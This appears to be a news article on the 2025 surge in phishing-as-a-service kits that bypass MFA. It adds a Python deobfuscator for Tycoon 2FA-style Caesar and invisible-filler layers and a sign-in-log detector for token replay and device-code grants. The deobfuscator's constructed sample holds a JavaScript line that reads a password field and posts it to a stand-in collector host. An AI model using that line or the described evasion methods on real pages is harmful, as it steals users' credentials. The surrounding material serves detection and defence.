Phishing-as-a-Service (PhaaS) Surge Elevates AiTM Threats

A surge in Adversary‑in‑the‑Middle phishing attacks exploiting Phishing‑as‑a‑Service frameworks has been recorded in 2025, allowing cybercriminals to systematically bypass multi‑factor authentication and harvest corporate credentials at industrial scale. Researchers from Sekoia and Barracuda warn that tools like Tycoon 2FA, EvilProxy and Sneaky 2FA are being rapidly refined, embedding advanced evasion techniques and automation that make detection increasingly challenging.

AiTM phishing campaigns leverage reverse proxies that intercept login credentials and session cookies in real time. When a user enters a password and MFA code on the phishing page, the proxy relays them to the legitimate service, such as Microsoft 365 or Google, and captures the session cookie the service sets once authentication succeeds. Attackers then replay that cookie to act as the user; because the cookie already represents a completed, MFA-satisfied session, no further MFA prompt is triggered.

Between January and February 2025, over one million PhaaS‑powered AiTM phishing attempts were blocked globally, with Tycoon 2FA accounting for nearly 90% of the incidents. EvilProxy and Sneaky 2FA contributed around 8% and 3% respectively. Tycoon 2FA has evolved markedly: its credential‑stealing scripts now employ Caesar‑cipher obfuscation (a fixed alphabetic shift, trivially reversible but enough to defeat naive string matching), invisible Hangul Filler characters (U+3164) inserted as visual noise, AES encryption, and browser fingerprinting to tailor the attack and evade detection.
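
Two of those layers, the filler characters and the Caesar shift, are mechanical and can be peeled off automatically when triaging a captured kit. The following is an added example, not Tycoon 2FA's code: the sample blob is constructed inside the script to imitate the described layers, and the marker-word list used to pick the right shift is an assumption about what a credential stealer contains. The AES layer is out of scope here; its key ships inside the kit and has to be read out of the script rather than brute-forced.

```python
"""Strip Hangul Filler padding and crack a Caesar-shifted payload.

Added example, not Tycoon 2FA's code: the sample blob is constructed here
to imitate two of the obfuscation layers the article describes. The AES
layer is not covered; its key ships inside the script and must be read
out of the kit rather than brute-forced.
"""
HANGUL_FILLER = "\u3164"  # U+3164, renders as blank space in most fonts
# Other invisible code points a kit might mix in; strip them alongside.
INVISIBLE = {HANGUL_FILLER, "\u115f", "\u1160", "\u200b", "\u200c", "\u200d", "\ufeff"}

# Tokens expected in a credential stealer once the shift is undone
# (an assumed heuristic; extend for the kit in front of you).
JS_MARKERS = ("function", "document", "window", "password", "fetch",
              "return", "location", "cookie", "value", "method")


def strip_invisible(text: str) -> str:
    """Remove zero-width and filler characters used as visual noise."""
    return "".join(ch for ch in text if ch not in INVISIBLE)


def caesar(text: str, shift: int) -> str:
    """Shift ASCII letters by `shift` positions; other characters pass through."""
    out = []
    for ch in text:
        if "a" <= ch <= "z":
            out.append(chr((ord(ch) - ord("a") + shift) % 26 + ord("a")))
        elif "A" <= ch <= "Z":
            out.append(chr((ord(ch) - ord("A") + shift) % 26 + ord("A")))
        else:
            out.append(ch)
    return "".join(out)


def marker_score(text: str) -> int:
    """Count JavaScript/credential-theft tokens; higher means more readable."""
    lower = text.lower()
    return sum(lower.count(w) for w in JS_MARKERS)


def crack_caesar(text: str) -> tuple[int, str]:
    """Try all 26 shifts and keep the one that looks most like real script."""
    best_shift = max(range(26), key=lambda s: marker_score(caesar(text, -s)))
    return best_shift, caesar(text, -best_shift)


def deobfuscate(blob: str) -> dict:
    """Undo the filler and Caesar layers; report what was stripped."""
    cleaned = strip_invisible(blob)
    shift, plain = crack_caesar(cleaned)
    return {"fillers_removed": len(blob) - len(cleaned),
            "shift": shift, "plaintext": plain}


# --- constructed sample (not real kit code) ------------------------------
PLAINTEXT = ('var p=document.getElementById("password").value;'
             'fetch("https://collector.invalid/log",{method:"POST",body:p});')


def obfuscate(text: str, shift: int) -> str:
    """Build the sample blob: shift letters, then pad every third char with a filler."""
    shifted = caesar(text, shift)
    return "".join(ch + HANGUL_FILLER if i % 3 == 0 else ch
                   for i, ch in enumerate(shifted))


SAMPLE = obfuscate(PLAINTEXT, 7)

if __name__ == "__main__":
    result = deobfuscate(SAMPLE)
    print(f"removed {result['fillers_removed']} fillers, shift {result['shift']}")
    print(result["plaintext"])
```

Scoring by marker words rather than letter frequency matters here: the payload is code, not English, so frequency tables mislead, while identifiers such as `document` and `password` survive any shift and reappear only at the correct one. In a real kit, also check for fillers inside string literals and identifiers, since the interpreter ignores them in some positions but not others.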


EvilProxy, in contrast, offers ease of deployment, enabling even actors with limited expertise to launch fully automated AiTM campaigns against cloud platforms by mimicking legitimate page source code and proxying credentials live.

Sneaky 2FA, meanwhile, uses Telegram‑based bots and clever URL structures to pre‑populate phishing forms with user email addresses, redirect non‑target users to innocuous sites, and selectively deliver phishing pages only to likely victims. It also embeds tracking codes that reinforce its selective targeting.

Darktrace analysts cite real‑world incidents where attackers abused legitimate platforms—such as Milanote—to deliver Tycoon 2FA phishing lures. This misuse of trusted resources bypasses traditional defences like email gateways, which often cannot distinguish between benign and malicious content. SC Media likewise highlights Sneaky Log’s Messenger‑driven delivery mechanism and anti‑sandbox filters—including blurred backgrounds and redirects to Wikipedia—making detection by anti‑phishing tools very difficult.

Microsoft’s threat intelligence team reports related token‑theft vectors such as OAuth‑consent and device‑code phishing. Rather than proxying the login, these attacks lure the user through a legitimate flow, an OAuth consent prompt or a device code (often delivered as a QR code), that ends with the attacker holding a valid access or refresh token. The victim satisfies MFA on the real service, so the attacker never faces an MFA challenge and the resulting tokens look like ordinary grants.

Threat actors ultimately deploy AiTM access to conduct Business Email Compromise, financial scams, internal reconnaissance, or onward phishing. They frequently install persistent controls—including email forwarding rules and additional MFA factors—to prolong intrusions.

Defensive responses emphasise layered security. Organisations are urged to deploy AI‑powered email defences, anomaly detection within identity logs, real‑time URL scanning, phishing‑resistant credentials such as FIDO2 security keys or passkeys (the authenticator binds the response to the legitimate origin, so a proxy served from another domain cannot complete the login), and contextual Conditional Access policies based on location or device status. Endpoint‑level inspection, token anomaly monitoring, and pre‑click URL analysis are also advised; the last must get past bot‑filtering gates such as Cloudflare Turnstile, which kits place in front of the phishing page so that scanners never see it.
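
The token anomaly monitoring recommended above, and the device-code grants described earlier, can both be caught from sign-in logs without any vendor product. The following is an added example, not from the article or any vendor: the events are constructed, and the field names (`session_id`, `asn`, `auth_protocol`) are a simplified stand-in for Entra ID sign-in log columns that must be mapped to the real schema before use. It flags one session cookie presented from more than one network or browser within a short window (the replay an AiTM operator performs) and device-code grants arriving from a network the user has never signed in from interactively.

```python
"""Flag AiTM-style token replay and suspicious device-code grants in sign-in logs.

Added example, not from the article or any vendor product. The records
below are constructed; field names are a simplified stand-in for Entra ID
sign-in log columns and must be mapped to the real schema before use.
"""
from collections import defaultdict
from datetime import datetime, timedelta

REPLAY_WINDOW = timedelta(hours=1)

# Constructed events. alice: one session cookie seen from two networks and
# two browsers within minutes (AiTM replay pattern). bob: normal. carol:
# a device-code grant from an ASN she has never signed in from.
EVENTS = [
    {"time": "2025-02-10T09:01:12Z", "user": "alice@example.com", "session_id": "s-1001",
     "ip": "203.0.113.7", "asn": "AS64500", "user_agent": "Chrome/122 Windows",
     "auth_protocol": "none"},
    {"time": "2025-02-10T09:03:40Z", "user": "alice@example.com", "session_id": "s-1001",
     "ip": "198.51.100.23", "asn": "AS64501", "user_agent": "Firefox/123 Linux",
     "auth_protocol": "none"},
    {"time": "2025-02-10T09:10:00Z", "user": "bob@example.com", "session_id": "s-2002",
     "ip": "192.0.2.44", "asn": "AS64502", "user_agent": "Edge/122 Windows",
     "auth_protocol": "none"},
    {"time": "2025-02-10T09:45:00Z", "user": "bob@example.com", "session_id": "s-2002",
     "ip": "192.0.2.44", "asn": "AS64502", "user_agent": "Edge/122 Windows",
     "auth_protocol": "none"},
    {"time": "2025-02-10T10:00:00Z", "user": "carol@example.com", "session_id": "s-3003",
     "ip": "192.0.2.90", "asn": "AS64502", "user_agent": "Chrome/122 macOS",
     "auth_protocol": "none"},
    {"time": "2025-02-10T10:20:00Z", "user": "carol@example.com", "session_id": "s-3004",
     "ip": "198.51.100.77", "asn": "AS64510", "user_agent": "Chrome/122 Windows",
     "auth_protocol": "deviceCode"},
]


def parse_time(value: str) -> datetime:
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def detect_token_replay(events, window=REPLAY_WINDOW):
    """One session ID presented from more than one network or client
    within `window`: the cookie was minted for one client and replayed
    from another, which is what an AiTM proxy operator does."""
    by_session = defaultdict(list)
    for ev in events:
        by_session[(ev["user"], ev["session_id"])].append(ev)
    alerts = []
    for (user, sid), evs in by_session.items():
        times = sorted(parse_time(e["time"]) for e in evs)
        networks = {(e["ip"], e["asn"]) for e in evs}
        agents = {e["user_agent"] for e in evs}
        if times[-1] - times[0] <= window and (len(networks) > 1 or len(agents) > 1):
            alerts.append({"rule": "token_replay", "user": user, "session_id": sid,
                           "networks": sorted(networks), "user_agents": sorted(agents)})
    return alerts


def detect_device_code_new_network(events):
    """Device-code grants from an ASN the user never used interactively.
    Device-code phishing hands the attacker a token directly, so the grant
    is recorded from the attacker's network, not the victim's."""
    known = defaultdict(set)
    for ev in events:
        if ev["auth_protocol"] != "deviceCode":
            known[ev["user"]].add(ev["asn"])
    return [{"rule": "device_code_new_network", "user": ev["user"],
             "asn": ev["asn"], "time": ev["time"]}
            for ev in events
            if ev["auth_protocol"] == "deviceCode" and ev["asn"] not in known[ev["user"]]]


def run(events=EVENTS):
    """Run both detections and return the combined alert list."""
    return detect_token_replay(events) + detect_device_code_new_network(events)


if __name__ == "__main__":
    for alert in run():
        print(alert)
```

Expect noise from mobile users whose session legitimately moves between networks; requiring both a network change and a user-agent change, or excluding known corporate egress ASNs, cuts that down. Note that under AiTM the first sign-in itself is recorded from the proxy's address rather than the victim's, so correlating the session's origin against the user's usual networks adds a further signal even before the replay occurs.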

Academic research echoes the urgency for adaptive defences: LLM‑based multi‑agent systems like MultiPhishGuard and fuzzy‑logic frameworks offer promising ways to detect adversarial phishing content while maintaining transparency and low false‑positive rates.


Notice an issue?

Arabian Post strives to deliver the most accurate and reliable information to its readers. If you believe you have identified an error or inconsistency in this article, please don't hesitate to contact our editorial team at editor[at]thearabianpost[dot]com. We are committed to promptly addressing any concerns and ensuring the highest level of journalistic integrity.
